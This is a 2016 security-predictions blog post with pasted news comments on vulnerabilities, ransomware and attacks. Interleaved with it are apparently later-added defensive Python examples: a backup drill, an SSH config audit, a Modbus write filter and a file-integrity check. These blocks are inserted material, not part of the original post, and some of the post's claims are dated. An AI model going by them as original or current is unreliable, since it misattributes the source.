Security trends for 2016

Here are my predictions for trends in information security and cyber security for year 2016.

Year 2015 was pretty bad for information security, and I would say that the trend is worrying. So I expect the year 2016 will have many information security challenges. If you want to keep yourself up at night, spend some time reading about the latest developments in cybersecurity. In 2015 airplanes were hacked, cars were hacked, and vulnerabilities were found in a breathtaking range of sensitive equipment from TSA locks to voting booths to medical devices. The big picture is even scarier. Former NSA Director Mike McConnell suspects China has hacked “every major corporation” in the US. Those problems will continue in 2016 and some new targets for attacks will be found. The system is broken. It isn’t keeping us, our companies, or our government safe. Worse yet, no one seems to know how to fix it.

Attacks through networks are becoming more common all the time. It will be hard to protect against targeted attacks. Hackers will not only customize malware, but will increasingly use sophisticated phishing and social engineering tricks to gain access to sensitive data. Attackers usually cover their tracks carefully, and identifying who is behind an attack can be very difficult. Behind targeted attacks are usually professional criminals. Criminals do not respect geographical borders, and hence attacks are spread evenly everywhere. Companies will struggle to absorb the security threats of combined PC and mobile devices in 2016.

 


EU information security decisions made in late 2015 will have an impact on what comes in 2016: the new EU data protection legislation package was approved, and the EU Court of Justice decided that the Safe Harbor procedure is invalid. This means that transfers of personal data from EU countries to the United States under Safe Harbor are now a violation of law – you need some other agreement for this. The situation will probably get clarified during 2016. Data protection legislation changes will lead to increased fines for the unprepared. Legal uncertainty and big fines are a toxic cocktail for some companies. The combination of stiff penalties and ambiguously worded provisions in the new EU-wide data-protection law, which would replace a patchwork of 28 national laws, raises daunting prospects for companies operating in Europe.

After the huge number of user information leaks in 2015 from all kinds of Internet services, cloud companies will face the challenge of earning trust in their security. You might have just dared to trust “the right cloud services,” since from the traditional information security point of view the main things seemed to be okay, but the privacy issues these leaks raised change that.

New environments will bring new threats. New operating system versions mean that administrators and users are less familiar with the environments. IPv6 will get more widely used, and the security of IPv6 networks is different from IPv4. Organizations are moving to virtualized environments, which are complex and create network layers that can become an attack vector. Growing network virtualization functionality and programmability are both an opportunity and a threat to security. Cyber security research will be important in 2016 as 5G networks will be critical infrastructure, on top of which, for example, transport, industry, health care and new operators will set up their business around 2020.

The huge amount of information security news is becoming harder and harder to manage in 2016. A key problem with security revelations, as with all other news coverage, is the exponential growth of information. There are a variety of news summaries produced on a daily basis, but they are not enough to get a good picture of what is happening. There are bigger and smaller news items, the impact of which is at times very difficult to assess. SMBs will become a bigger target for cybercriminals. Network and security professionals continue to be among the toughest IT talent to find and hire.

The old way of network security, focused on perimeter defense, is not enough in 2016. The old mantras “encrypt everything” and “secure the perimeter” are not enough. One deceptive truth seems to drive much of the cybersecurity industry down a rabbit hole: if you keep bad actors and bad software out of your system, you have nothing to worry about. It does not work like that anymore. As perimeter security gets stronger, malicious actors are looking for easier entry points to compromise an organisation through the breadth of its digital attack surface. Now malicious actors target “endpoints”—any device or sensor connected to a network—to break into that network. Traditional sandboxing will no longer protect against the growing malware landscape. Today, most private networks have far too many endpoints to properly secure. In an age of “Bring Your Own Device,” the cloud, remote access, and the Internet of Things, there are too many vulnerabilities hackers can exploit. Keep in mind that everything connected to the Internet can, and will, be hacked. To address those threats in 2016, security experts should assume compromise – that hackers and malware already have breached their defenses, or soon will – and instead classify and mitigate threats. In addition to a public key infrastructure lock-and-key system, you will also need an integrity solution that acts like an alarm. To protect against advanced threats, security professionals will increase their reliance on centralized security management solutions. You need to have prioritization and response plans for various kinds of breaches – with a strong focus on integrity.

Law enforcement versus Silicon Valley tension will continue to be strong throughout year 2016. In 2015 law enforcement and politicians on both sides of the Atlantic lined up to repeatedly complain that the web was “going dark” as the result of end-to-end encryption and that this was hampering the investigation of terrorism and other serious crimes. Technologists and cryptographers argue that governments are trying to weaken encryption by demanding some form of privileged access for government. It’s not clear how much encryption the NSA can break. With renewed focus on how encrypted messages can be used to plot terrorist attacks, President Barack Obama’s administration is stepping up pressure on the tech sector to help in the battle. Privacy remains a major counter-argument. It seems that Governments Lie About Encryption Backdoors. Encryption systems weakened by mandated backdoors would not be effective in fighting the terrorists that governments invoke as their reason for wanting those backdoors in the first place.

But this does not stop some government officials from demanding such things, with varying success in different countries. Another fact is that the existence of coded communications is a reality and the U.S. may not be able to do much about it, because nearly everyone living in modern society uses it: encryption protects your bank information, prevents your password from being stolen when you log into a website, and allows all e-commerce transactions to take place securely. Encryption weakened by mandated backdoors would put all of us at an enormous risk of exposure from data breaches and associated online risks. The truth in 2016 is that any form of privileged access for government – i.e., a backdoor – would inevitably weaken crypto-systems and make them more vulnerable to attacks by foreign governments’ intelligence agencies as well as criminals. Juniper’s VPN security hole is proof that govt backdoors are bonkers. Encryption backdoors would be a gleeful win-win for terrorists and a horrific lose-lose for you – the bad guys having strong protections for their data, and the rest of us not. A poorly thought-out and crude surveillance technique can have a devastating effect on a country’s internet security: for example, Kazakhstan will force its citizens to install internet backdoors by requiring all Internet users to install a state-issued root certificate by January 1, 2016.

Google, Mozilla and Microsoft are pushing for an early SHA-1 crypto cutoff that could happen in 2016 instead of the earlier planned Jan 1st, 2017, due to recent research showing that SHA-1 is weaker than previously believed, because it has been cracked without enormous effort. Mozilla, Microsoft and now Google are all considering bringing the deadline forward by six months to July 1, 2016. SHA-2 is going to be used as the replacement function for SHA-1. Websites like Facebook and those protected by CloudFlare have implemented a SHA-1 fallback mechanism for those systems that do not support SHA-2. Chrome will start displaying errors if SHA-1 certificates are employed in early 2016 and will completely stop supporting SHA-1 certificates at the end of 2016.

The use of Blockchain technology, a permissionless distributed database based on the bitcoin protocol that runs across a global network of independent computers, will spread more widely than just Bitcoin virtual money. With bitcoin, Blockchain tracks the exchange of money. But it can also track the exchange of anything else that holds value, including stocks, bonds, and other financial securities. Overstock has already used the blockchain to issue private bonds. The Securities and Exchange Commission has approved a plan from online retailer Overstock.com to issue company stock via the Internet, signaling a significant shift in the way financial securities will be distributed and traded in the years to come. Overstock built its technology under the aegis of a subsidiary called TØ.com, and it plans to offer this “cryptosecurity” tech as a service to other businesses. Nasdaq OMX—the company behind the Nasdaq stock exchange—is using the blockchain to oversee the exchange of private stock. Also several major companies from across both the technology and financial industries—including IBM, Intel, and Cisco as well as the London Stock Exchange Group and big-name banks JP Morgan, Wells Fargo, and State Street—have joined forces to create an alternative to the blockchain with the Linux Foundation.

The use of disk encryption will increase, and there are different ways to do it with different security levels. Microsoft has introduced Windows 10 disk encryption where the encryption keys are uploaded to Microsoft. This approach has some advantages and disadvantages. The gold standard in disk encryption is end-to-end encryption, where only you can unlock your disk. This is what most companies use, and it seems to work well. It protects data in case your device is lost or stolen. But what if you forget or lose your key? There are certainly cases where it’s helpful to have a backup of your key or password – so keeping a backup of your recovery key in your Microsoft account could be genuinely useful for probably the majority of users that don’t have high security needs. The disadvantage of this approach is that your computer is now only as secure as that database of keys held by Microsoft, which means it may be vulnerable to hackers, foreign governments, and people who can extort Microsoft employees.


Weak and leaked passwords are still a huge security problem in 2016. Passwords are often the weakest part when it comes to securing users’ accounts, as many don’t use complex passwords or they reuse the same password across services. Two-factor authentication – like using a USB stick with a secret token or entering a code sent via text message to your phone – can help to increase security, but many users also find this to be a hassle as it introduces an additional step to the login process.

Google has begun testing a login system that uses phone notifications for authentication instead of passwords: users authenticate by responding to a notification sent to their smartphone. The idea is similar to Yahoo’s recently launched “Account Key,” which also offers a password-free means of signing in, involving a push notification sent to your phone that then opens an app where you approve the log-in.

The smartphone will become a more and more security-critical part of your life. “Increasingly, individuals and organisations are adopting password managers and multi-factor authentication technologies to plug some of the holes in password-based authentication. We foresee a world where practically everyone uses their smartphone as a multi-factor authentication element. In this world, the smartphone becomes your most valuable asset: something that enables you to unlock your life online and a target for attackers seeking to access your services.”

Expect that the number of mobile vulnerabilities will only grow in 2016. In 2016 we will see increasing numbers of cyber criminals using mobile applications to spread malware. Mobile presents an easy target for cyber criminals, because it is an attack surface that is open and extremely difficult to defend once an app has been released. Android threats will become more than just headline-grabbers. Will 2016 be the year iOS malware goes mainstream?


Critical infrastructures will be highly targeted in 2015. SCADA and ICS networks were not designed for security. Attacks against these systems have increased in recent years. I expect this trend to only get worse. There are still many companies that run their critical systems on Windows XP, as “there are some people who don’t have an option to change.” Many times the OS is running in automation and process control systems that run business and mission-critical systems, both in private sector and government enterprises. For example, the US Navy is using the obsolete operating system Microsoft Windows XP to run critical tasks. It all comes down to money and resources, but if someone is obliged to keep something running on an obsolete system, it’s the wrong approach to information security completely.

Cars were hacked at a record rate in 2015, and they will be hacked at least at the same rate in 2016. Modern cars feature more gadgetry and connected systems, and this makes vehicles just as vulnerable to today’s threats and attacks. I Am The Cavalry has published a five star Cyber Safety Framework to mitigate this threat in cars; hopefully car component makers study it.

IoT and smart devices are still at risk. The Internet of Things will continue to emerge, and businesses will need to think about how to protect their smart devices and prepare for the wider adoption of IoT. IoT platforms are not yet the weapon of choice for commercial malware authors – but business beware. Wearables won’t be safe either, as they are built using largely the same, too often vulnerable, technologies as other IoT systems. IoT security is still in its infancy in 2016.

Cyber criminals became more active in 2015, particularly with ransom-malware. The ransom-malware problem will continue to be big in 2016. Commercial malware authors will continue to invest heavily, and exploit kits will continue to dominate on the web. Ransomware today is big business. Ransomware takes control of a computer and holds it hostage until the victim pays, usually in the digital currency Bitcoin. As a remedy against ransom-malware, I recommend ensuring with IT support or your service provider that the data backup and restore procedure is operational, practiced and tested. You may need it in 2016 to get your data back without considering paying the criminals. To date ransomware has hit Windows users hardest, although Android and MacOS users are now also facing similar extortion.
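A "practiced and tested" restore procedure means actually restoring and checking the result, not just seeing that a backup job finished. The following is an added example (my own code, not from the post or any backup product) of such a drill: it archives a directory, restores the archive into a scratch location, and verifies every restored file's SHA-256 against the original. The sample directory tree in drill() is constructed for the run.

```python
"""Backup-and-restore drill: archive a directory, restore the archive into a
scratch location, and verify every restored file's SHA-256 against the
original, so the restore path is proven to work before it is needed.
Added example, not from the post; the sample tree in drill() is constructed."""
import hashlib
import tarfile
import tempfile
from pathlib import Path


def tree_hashes(root: Path) -> dict:
    """Relative POSIX path -> SHA-256 for every regular file under root."""
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}


def make_backup(src: Path, archive: Path) -> None:
    """Write a gzip tar of src; each entry is added with a path relative to src."""
    with tarfile.open(archive, "w:gz") as tar:
        for p in sorted(src.rglob("*")):
            tar.add(p, arcname=p.relative_to(src).as_posix(), recursive=False)


def restore_backup(archive: Path, dest: Path) -> None:
    """Extract into dest. The 'data' filter (Python 3.12+, backported to some
    3.8-3.11 releases) rejects absolute and traversal paths in the archive."""
    with tarfile.open(archive, "r:gz") as tar:
        try:
            tar.extractall(dest, filter="data")
        except TypeError:            # older Python without the filter argument
            tar.extractall(dest)


def verify_restore(src: Path, restored: Path) -> dict:
    """Compare hashes; 'ok' only if every original file came back byte-identical."""
    want, got = tree_hashes(src), tree_hashes(restored)
    return {
        "ok": want == got,
        "file_count": len(want),
        "mismatched": sorted(k for k in want if got.get(k) != want[k]),
        "extra": sorted(set(got) - set(want)),
    }


def drill() -> dict:
    """Run the whole cycle on a constructed two-file tree and return the verdict."""
    with tempfile.TemporaryDirectory() as d:
        base = Path(d)
        src = base / "data"
        (src / "docs").mkdir(parents=True)
        (src / "docs" / "report.txt").write_text("constructed quarterly figures\n")
        (src / "notes.txt").write_text("constructed notes\n")
        archive = base / "backup.tar.gz"
        make_backup(src, archive)
        restored = base / "restore"
        restored.mkdir()
        restore_backup(archive, restored)
        return verify_restore(src, restored)


if __name__ == "__main__":
    print(drill())
```

Restoring into a separate scratch directory rather than over the live data is deliberate: the drill must never put the production copy at risk. Note that this only proves the restore path works; ransomware also encrypts any backup it can reach, so the archive itself belongs on storage the workstation cannot write to.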

Ransomware will continue to dominate in 2016, and it is only a question of time before we see things beyond data being ransomed. We have already seen websites being held ransom with DDoS. Intel’s McAfee Labs also noted a huge spike in ransomware in early 2015, and worries about ransomware in the IoT space—including medical devices. And Kaspersky predicts the “nightmare of ransomware” to continue and “spread to new frontiers” in 2016. The article Ransomware Is Coming to Medical Devices tells that, according to a report released recently by Forrester Research, the number one cybersecurity prediction for 2016 is: “We’ll see ransomware for a medical device or wearable.” “It’s definitely feasible from a technical standpoint.” Networked medical devices save lives. Despite the hacking risk, it’s an informed trade-off. Medical device ransomware would be a modern form of highway robbery with lives at stake.

2,232 Comments

  1. Tomi Engdahl says:

    Bug that can leak crypto keys just fixed in widely used OpenSSH
    Vulnerability allows malicious servers to read memory on connecting computers.
    http://arstechnica.com/security/2016/01/bug-that-can-leak-crypto-keys-just-fixed-in-widely-used-openssh/

    A critical bug that can leak secret cryptographic keys has just been fixed in OpenSSH, one of the more widely used implementations of the secure shell (SSH) protocol.

    The vulnerability resides only in the version end users use to connect to servers and not in versions used by servers. A maliciously configured server could exploit it to obtain the contents of the connecting computer’s memory, including the private encryption key used for SSH connections. The bug is the result of code that enables an experimental roaming feature in OpenSSH versions 5.4 to 7.1.

    “The matching server code has never been shipped, but the client code was enabled by default and could be tricked by a malicious server into leaking client memory to the server, including private client user keys,” OpenSSH officials wrote in an advisory published Thursday. “The authentication of the server host key prevents exploitation by a man-in-the-middle, so this information leak is restricted to connections to malicious or compromised servers.”

    The advisory said that anyone using a vulnerable version should update right away. Those who are unable to update should disable roaming by adding the string UseRoaming no to the global ssh_config(5) file or to the user configuration.

    More: http://www.epanorama.net/newepa/2016/01/15/openssh-client-bugs-cve-2016-0777-and-cve-2016-0778/

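The workaround in the advisory quoted above is a one-line config change, but it only helps if it actually lands in the global section (or a Host * block) of a file that OpenSSH reads. The following is an added example, my own code rather than anything from the OpenSSH project, that audits a client configuration for the "UseRoaming no" mitigation and produces a hardened copy when it is missing. It assumes the usual OpenSSH config semantics: the first value obtained for an option wins, ~/.ssh/config is read before /etc/ssh/ssh_config, and an option inside a Host/Match block applies to that block only. The config snippets in the tests are constructed.

```python
"""Audit an OpenSSH client configuration for the "UseRoaming no" mitigation
and produce a hardened copy when it is missing. Added example, not OpenSSH
project code. Assumes OpenSSH semantics: the first value obtained for an
option wins, and options inside a Host/Match block apply to that block only."""
import re
import sys
from pathlib import Path

ROAMING_RE = re.compile(r"^\s*UseRoaming\s+(\S+)", re.IGNORECASE)
BLOCK_RE = re.compile(r"^\s*(Host|Match)\b", re.IGNORECASE)
HOST_ALL_RE = re.compile(r"^\s*Host\s+\*\s*$", re.IGNORECASE)   # applies to every host


def global_roaming_setting(config_text: str):
    """Return 'yes'/'no' for the first UseRoaming line that applies to every
    host (global section or a 'Host *' block reached before any other block),
    or None if there is none. Conservative: a 'Host *' block that follows a
    host-specific block is not counted, because earlier blocks may override it."""
    for line in config_text.splitlines():
        if BLOCK_RE.match(line) and not HOST_ALL_RE.match(line):
            break                                  # left the globally-applicable part
        m = ROAMING_RE.match(line)                 # commented-out lines do not match
        if m:
            return m.group(1).lower()
    return None


def roaming_disabled_globally(config_text: str) -> bool:
    return global_roaming_setting(config_text) == "no"


def harden(config_text: str) -> str:
    """Return the config with 'UseRoaming no' as the first directive unless it is
    already disabled globally; placing it first makes it win over a later 'yes'."""
    if roaming_disabled_globally(config_text):
        return config_text
    return "UseRoaming no\n" + config_text


def audit_files(paths) -> dict:
    """Map each existing config path to whether it disables roaming globally."""
    result = {}
    for p in paths:
        p = Path(p).expanduser()
        if p.is_file():
            result[str(p)] = roaming_disabled_globally(p.read_text())
    return result


if __name__ == "__main__":
    # The user config is read before the system-wide one, so both are checked.
    targets = sys.argv[1:] or ["~/.ssh/config", "/etc/ssh/ssh_config"]
    for path, ok in audit_files(targets).items():
        print(f"{path}: {'UseRoaming no set' if ok else 'roaming NOT disabled globally'}")
```

Running it with no arguments checks the two default locations; passing paths audits those instead. The audit deliberately reports a false negative rather than a false positive when the directive sits only inside a host-specific block, since that does not protect connections to other hosts.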
  2. Tomi Engdahl says:

    Zero-Day Vulnerability Discovered In FFmpeg Lets Attackers Steal Files Remotely
    http://it.slashdot.org/story/16/01/14/2214244/zero-day-vulnerability-discovered-in-ffmpeg-lets-attackers-steal-files-remotely

    A zero-day vulnerability in the FFmpeg open-source multimedia framework, which is currently used in numerous Linux kernel-based operating systems and software applications, also for the Mac OS X and Windows platforms, has been discovered

    Zero-Day FFmpeg Vulnerability Lets Anyone Steal Files from Remote Machines
    http://news.softpedia.com/news/zero-day-ffmpeg-vulnerability-lets-anyone-steal-files-from-remote-machines-498880.shtml

    A zero-day vulnerability in the FFmpeg open-source multimedia framework, which is currently used in numerous Linux kernel-based operating systems and software applications, also for the Mac OS X and Windows platforms, was unveiled recently.

    The vulnerability was discovered on January 12, 2016, by Russian programmer Maxim Andreev in the current stable builds of the FFmpeg software, and it would appear that it allows anyone who has the necessary skills to hack a computer to read local files on a remote machine and send them over the network using a specially crafted video file.

    The vulnerability is limited to reading local files and sending them over the network, not to remote code execution, but it’s enough to do some damage. The FFmpeg developers are aware of the issue, and they are trying to patch it as we speak. James Darnley of FFmpeg suggests that disabling HLS (HTTP Live Streaming) while building the package should do the trick until a fix is committed.

    “ffmpeg has a vulnerability in the current version that allows the attacker to create a specially crafted video file, downloading which will send files from a user PC to a remote attacker server. The attack does not even require the user to open that file – for example, KDE Dolphin thumbnail generation is enough”

    Already patched in Arch Linux

    We’ve been informed earlier today, January 13, 2016, that Arch Linux developers have already patched the FFmpeg 2.8.4 packages in the operating system by rebuilding them without the AppleHTTP and HLS demuxers.

  3. Tomi Engdahl says:

    “DDoS-For-Bitcoin” Blackmailers Arrested
    http://yro.slashdot.org/story/16/01/15/0210222/ddos-for-bitcoin-blackmailers-arrested

    The DDoSing outfit that spawned the trend of “DDoS-for-Bitcoin” was arrested by Europol in Bosnia and Herzegovina last month. DD4BC first appeared in September 2015, when Akamai blew the lid on their activities.

    Members of DD4BC, the Group That Blackmailed Companies with DDoS Attacks, Arrested by Europol
    http://news.softpedia.com/news/members-of-dd4bc-the-group-that-blackmailed-companies-with-ddos-attacks-arrested-by-europol-498797.shtml

    Europol has announced the arrest of key members of the DD4BC hacking outfit that blackmailed multiple European companies with DDoS attacks in exchange for Bitcoin payments.

    Austrian authorities started the investigation after several local companies reported blackmail attempts. Europol’s European Cybercrime Centre (EC3) and the Joint Cybercrime Action Taskforce (J-CAT) soon joined the operation, and a continent-wide hunt started, with law enforcement agencies in multiple countries looking for clues that might help them discover DD4BC’s whereabouts.

    UK’s Metropolitan Police Cyber Crime Unit (MPCCU) was the one that tracked down the group, identifying key members in Bosnia and Herzegovina.

    The activities of the DD4BC group were first detailed by Akamai at the start of September 2015, but their first attacks were recorded as early as September 2014.

    The group operated by launching small DDoS attacks against companies and then asked for a ransom in Bitcoin to prevent further assaults. If the victim declined to pay, the group would then launch more powerful attacks in the following days. This went on until the hackers got paid or bored.

    Ever since Akamai published their report on the group’s modus operandi, DD4BC went dormant.

  4. Tomi Engdahl says:

    Stonesoft merges into its Yankee owner

    American arms manufacturer Raytheon bought the Finnish network security company Stonesoft from Intel.

    Raytheon has announced its security holdings will form the new company it is setting up:
    The new Forcepoint company will consist of Raytheon Cyber Products, Websense and Stonesoft.
    Raytheon’s goal is to provide customers with security products on a large scale, such as for the Internet, e-mail and terminals, as well as products for protection, firewalls, and data analytics.
    Raytheon’s long history of cooperation with the US Department of Defense speaks to its broad capabilities, which can be utilized in the private sector.

    According to Forcepoint’s product director Mike Siegel, the strength of the new company will be its cloud-based system that distributes data among different tools and produces analysis reports of security threats.

    Forcepoint has at the beginning around 2200 employees in 44 locations worldwide.

    Source: http://www.tivi.fi/Kaikki_uutiset/stonesoft-sulautuu-jenkki-isantaansa-6245381

  5. Tomi Engdahl says:

    Securing a wireless application
    http://www.controleng.com/single-article/securing-a-wireless-application/3b6559f5017e8773396d0cba486163e7.htm

    Industrial wireless applications are being used by leading manufacturers and operators to improve availability and reduce costs, and there are plenty of protection techniques such as defense-in-depth to keep a network from being compromised by a security breach.

    Industrial wireless applications are seeing more and more action by leading manufacturers and operators to improve availability and reduce costs. In theory, that sounds great, but it is worth considering how difficult it is to make sure these industrial networks are secure before using them in a facility.

    The good news is the best practices, technologies, and products currently available make implementing wireless applications securely straightforward for engineering teams. Wireless applications are no different than wired applications when it comes to an essential industrial control system (ICS) security best practice-defense-in-depth (DiD). DiD is a holistic approach built on three core concepts:

    1. Multiple layers of defense: A variety of security solutions end up used so if an attacker bypasses one area, another can provide the needed defense.
    2. Differentiated layers of defense: Each security layer is slightly different so an attacker can′t automatically get through all layers of defense.
    3. Threat-specific layers of defense: Each defense is for the specific context and threat, allowing protection based on the behavior and context of the systems using these protocols.

    Whether a threat is an accidental internal incident or a deliberate external attack, a DiD approach will detect, isolate, and control it. The wireless defense strategies outlined work together to provide the layers of protection needed to make sure the user’s wireless local area network (WLAN) is secure.

    Protection technique #1

    A challenge with WLAN transmission paths is they can broadcast outside a company’s property boundaries.

    Industry cooperation has led to standards such as IEEE 802.11i/WPA2 that protect the confidentiality and integrity of wireless data. All current products on the market must comply with these standards, ensuring control system communications are authentic, and attackers cannot extract sensitive data.

    In regard to WPA2, be sure to implement its Enterprise mode for strong device authentication. Unlike personal networks, WPA2 (Enterprise mode) provides different keys for different devices, with the keys managed in a central database such as RADIUS. Lost or stolen devices can be disconnected from the network simply by removing their information from the database.

    Furthermore, with WPA2 (Enterprise mode), individual devices can be assigned to different virtual LANs (VLANs) so devices with different roles can be clearly differentiated.

    Protection technique #2

    Another aspect of wireless communications you want to protect are management frames

    Protected management frames (PMF) are useful because they are designed to protect against forgery by extending the mechanism for authentication and encryption present in WPA2 to management frames. By using products with the PMF capability, it is impossible for misused management functions to attack a network.

    Protection technique #3

    Even the most effective WLAN encryption doesn’t offer protection when a security incident originates inside the network. But, by selectively limiting communication to only what is required to run the industrial application, additional barriers are established that are designed to limit the impact of internal attacks.

    This type of limitation is another defense-in-depth mechanism that considerably increases the all-around security of a network. Other strategies for limiting communication within the network include:

    Protect WLAN data by implementing a configurable Layer 2 firewall at the Ethernet level. To do this you need to make sure you are using Access Points with a built-in Layer 2 firewall. The best ones can filter routed and bridged traffic as well as packet-filter traffic between WLAN clients.
    Apply stateful deep-packet inspection (DPI) to secure protocols. After the Layer 2 firewall rules are applied, the DPI firewall inspects the content of the contained messages and applies more detailed rules. For example, a Modbus DPI firewall can determine if the Modbus message is a read or a write message and then drop all write messages. Good DPI firewalls can also “sanity check” traffic for strangely formatted messages or unusual behaviors.

    DPI firewalls are often used to protect zones of equipment with similar security requirements as per ISA IEC 62443 or to protect equipment critical to the process. Be aware that DPI is sometimes known by other terms, such as content inspection or protocol whitelisting, and it is not a widely available capability.

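Protection technique #3 above describes a Modbus DPI firewall that tells read messages from write messages, drops the writes, and sanity-checks strangely formatted traffic. The following is an added example of that logic, my own code and not taken from the article or any firewall product: it parses the Modbus/TCP MBAP header, classifies the function code, rejects frames whose length field disagrees with the frame, and returns an allow/drop verdict. The three frames in SAMPLE_FRAMES are constructed; function code sets follow the public Modbus application protocol specification.

```python
"""Minimal Modbus/TCP deep-packet-inspection filter: parse the MBAP header,
classify the function code as read or write, sanity-check the length field,
and drop writes (and anything malformed). Added example, not from the article
or any product; the frames in SAMPLE_FRAMES are constructed for illustration."""
import struct

# Function codes from the Modbus application protocol specification.
READ_FUNCTIONS = {1, 2, 3, 4, 7, 17}       # coils, inputs, registers, status, server id
WRITE_FUNCTIONS = {5, 6, 15, 16, 22, 23}   # single/multiple coils and registers, mask write, read/write
MAX_LENGTH = 254                           # MBAP length upper bound (260-byte ADU)


def parse_modbus_tcp(frame: bytes) -> dict:
    """Parse the 7-byte MBAP header plus function code; raise ValueError if the
    frame is not a well-formed Modbus/TCP message."""
    if len(frame) < 8:
        raise ValueError("frame shorter than MBAP header plus function code")
    transaction_id, protocol_id, length, unit_id = struct.unpack(">HHHB", frame[:7])
    if protocol_id != 0:
        raise ValueError("protocol id must be 0 for Modbus")
    if length > MAX_LENGTH:
        raise ValueError("length field exceeds maximum ADU size")
    if length != len(frame) - 6:           # length counts unit id + PDU
        raise ValueError("length field does not match frame size")
    return {"transaction_id": transaction_id, "unit_id": unit_id,
            "function_code": frame[7], "data": frame[8:]}


def classify(function_code: int) -> str:
    if function_code & 0x80:
        return "exception"                 # exception response, not a request
    if function_code in READ_FUNCTIONS:
        return "read"
    if function_code in WRITE_FUNCTIONS:
        return "write"
    return "other"                         # diagnostics, vendor-specific, unknown


def dpi_verdict(frame: bytes, allow_writes: bool = False) -> tuple:
    """Return (allowed, reason). Default policy: reads pass; writes and anything
    unknown or malformed are dropped, as a read-only zone firewall would do."""
    try:
        msg = parse_modbus_tcp(frame)
    except ValueError as exc:
        return False, f"malformed: {exc}"
    kind = classify(msg["function_code"])
    if kind == "read":
        return True, f"read fc={msg['function_code']}"
    if kind == "write" and allow_writes:
        return True, f"write fc={msg['function_code']} (writes allowed)"
    return False, f"dropped {kind} fc={msg['function_code']}"


# Constructed sample frames: read 8 holding registers (fc 3), write one
# register (fc 6), and a truncated frame whose length field says 6 but only
# 4 bytes follow it.
SAMPLE_FRAMES = {
    "read_holding": bytes.fromhex("000100000006010300000008"),
    "write_single": bytes.fromhex("00020000000601060001" "00ff"),
    "truncated":    bytes.fromhex("00030000000601030000"),
}


def filter_samples(allow_writes: bool = False) -> dict:
    return {name: dpi_verdict(f, allow_writes) for name, f in SAMPLE_FRAMES.items()}


if __name__ == "__main__":
    for name, (ok, why) in filter_samples().items():
        print(f"{name:13s} {'ALLOW' if ok else 'DROP':5s} {why}")
```

The default-deny stance for unknown function codes is the point: a zone firewall protecting equipment that should only ever be polled has no reason to pass diagnostics or vendor-specific codes, and a frame that fails the length check is dropped before any function-code logic runs.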
  6. Tomi Engdahl says:

    In a world where 90% of devices store personal information and the majority of connected devices don’t have sufficient security, the Internet of Things requires more than an attack dog.

    Source: http://www.eetimes.com/document.asp?doc_id=1328631&page_number=8

  7. Tomi Engdahl says:

    The Finnish Communications Regulatory Authority’s Kyberturvallisuuskeskus warns in a statement that in Finland the popular content management systems WordPress and Joomla are attractive targets for malware-disseminating network attacks.

    Publishing systems are continuously confronted with attacks carried out with automated tools. When attackers find a vulnerable publishing system on the network, they add a malicious redirection to the site, which can lead to infection of the device used to visit it. Cybercriminals often use Cryptowall-like extortion malware.

    On the WordPress platform the harmful control code is often added to the file wp-includes/nav-menu.php, and on the Joomla platform to the file includes/defines.php. In addition to these, cyber criminals leave a back door in one or more of the various files on the server.

    Sources:
    http://www.tivi.fi/Kaikki_uutiset/viestintavirasto-varoittaa-nama-julkaisujarjestelmat-jatkuvasti-verkkohyokkaysten-kohteena-6240224
    https://www.viestintavirasto.fi/kyberturvallisuus/tietoturvanyt/2015/12/ttn201512161547.html

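The notice above names specific files that get modified and adds that a back door is left in one or more other files; the prediction earlier in the post calls for an integrity solution that "acts like an alarm". The following is an added example of such an alarm, my own code and not from the Finnish authority or any CMS project: it records a baseline of SHA-256 hashes for every PHP file under a site root and later reports files that were modified, removed or added. demo() builds a constructed WordPress-like tree, takes a baseline, changes wp-includes/nav-menu.php and drops an unexpected PHP file, and returns the comparison.

```python
"""File-integrity alarm for a CMS install: record a baseline of SHA-256 hashes
for every PHP file, then report files that were modified, removed or added.
Added example, not from the notice or any CMS project; demo() uses a
constructed directory tree."""
import hashlib
import json
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path, pattern: str = "*.php") -> dict:
    """Relative POSIX path -> hash for every file matching pattern under root."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob(pattern)) if p.is_file()}


def save_baseline(baseline: dict, path: Path) -> None:
    path.write_text(json.dumps(baseline, indent=2, sort_keys=True))


def load_baseline(path: Path) -> dict:
    return json.loads(path.read_text())


def compare_tree(root: Path, baseline: dict, pattern: str = "*.php") -> dict:
    """Diff the current tree against the baseline. Any non-empty list is the
    alarm condition. A new PHP file is reported just like a changed one, since
    a dropped back door is a file the baseline never saw."""
    current = build_baseline(root, pattern)
    return {
        "modified": sorted(k for k in baseline if k in current and current[k] != baseline[k]),
        "missing": sorted(k for k in baseline if k not in current),
        "new": sorted(k for k in current if k not in baseline),
    }


def demo() -> dict:
    """Constructed scenario: baseline a tiny WordPress-like tree, then change a
    named file and add an unexpected PHP file, and return the comparison."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "wp-includes").mkdir()
        (root / "wp-includes" / "nav-menu.php").write_text("<?php // constructed original\n")
        (root / "index.php").write_text("<?php // constructed original\n")
        store = root / "baseline.json"       # in real use keep this outside the web root
        save_baseline(build_baseline(root), store)
        # Changes made after the baseline was taken.
        (root / "wp-includes" / "nav-menu.php").write_text("<?php // constructed: changed\n")
        (root / "wp-content").mkdir()
        (root / "wp-content" / "unexpected.php").write_text("<?php // constructed: new file\n")
        return compare_tree(root, load_baseline(store))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

In real use the baseline is taken right after a clean install or update and stored somewhere the web server cannot write, and the comparison runs from cron; a legitimate update produces a burst of "modified" entries that should be followed by a fresh baseline, whereas a single changed nav-menu.php or a lone new PHP file in an upload directory is what this alarm is for.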
  8. Tomi Engdahl says:

    Mobile phone security is being unified

    Nordic communications authorities have issued their first joint recommendation to improve the security of mobile networks. The recommendation aims to raise the security of partly already obsolete implementations.

    Nordic communications authorities aim to bring mobile communications and integrated network security to the same level in all the Nordic countries, especially since in recent years a number of potential abuses of mobile telephony SS7 signaling traffic have been raised.

    The function of signalling transport is to enable, inter alia, forwarding calls and other messages within the telecommunications operator’s own network, as well as within and between different telecom operators’ networks.

    Many of the technical solutions used in the telephone network were designed in the 1970s and 80s, so the security deficiencies are due to the long life cycle. The opportunities for irregularities are originally related to the exploitation of the trust-based approach of a closed network between telecom companies.

